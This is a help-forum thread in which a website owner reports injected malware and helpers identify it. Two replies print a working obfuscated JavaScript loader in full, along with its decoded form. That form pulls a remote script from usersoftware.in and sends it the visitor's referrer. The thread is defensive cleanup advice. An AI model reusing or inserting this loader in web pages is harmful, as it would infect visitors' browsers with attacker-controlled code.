MAlware Found on our Server - Novice here - Need some advice

[Toff]

Hello everyone,

A came across your forum just googling it up. Thank god I finally found a place to hopfully find an answer to this.
Around may we received replies from customers stating that we had a virus our on website.

http://www.malwaredomainlist.com/mdl.php?search=usersoftware.in&colsearch=All&quantity=50

If you visit:
www.graduationsource.com or www.avantisystemsusa.com

usersoftware.in loads in the loading screen.

I have no idea what to do. No idea how to fix the problem and no idea even where to begin. Any input would be greatly appreciated.

[sowhat-x]

Code: [Select]

<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
A quick look shows that the above is the malicious code,
that has been injected/infecting over there...when decoded,it resolves to:

Code: [Select]

<script language="JavaScript">
var l='http://usersoftware.in/xq/vstavka.php?r=';var r=encodeURIComponent(document.referrer);if(r){document.write('<script src='+l+r+'></scr'+'ipt>');}
</script>
Meaning,as a first step re-action,you should grep through your htmls and clean it...

[Orac]

Hi Toff

I assume you have root access to the server.

Comment out this whole sction of script and it will block the link to usersoftware.in

Code: [Select]

<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
It looks as thou they may also be other malware on the sites, which will take further digging to revel.

Please post back as to how you got on.

[Toff]

After removing all of the coding it automatically embeds itself again on all of the pages.  

[sowhat-x]

Toff,say until a few more digging/analysis takes place,
have a view at the links mentioned in this post here,to get an idea of what's been happening...
http://www.malwaredomainlist.com/forums/index.php?topic=1965.msg3919#msg3919
They might also give you a few ideas on where to start searching in your server,
for places where extra malicious scripts/code might reside etc...

[Toff]

Alright perfect, I'm going to have my programmers go through everything. Thanks for the input!

[MysteryFCM]

Just an FYI ..... if the script is re-appearing after removal, then you've got something running on the server that shouldn't be, which likely means you've also got a remote shell on there too (which will be how they put the files there after they exploited the server)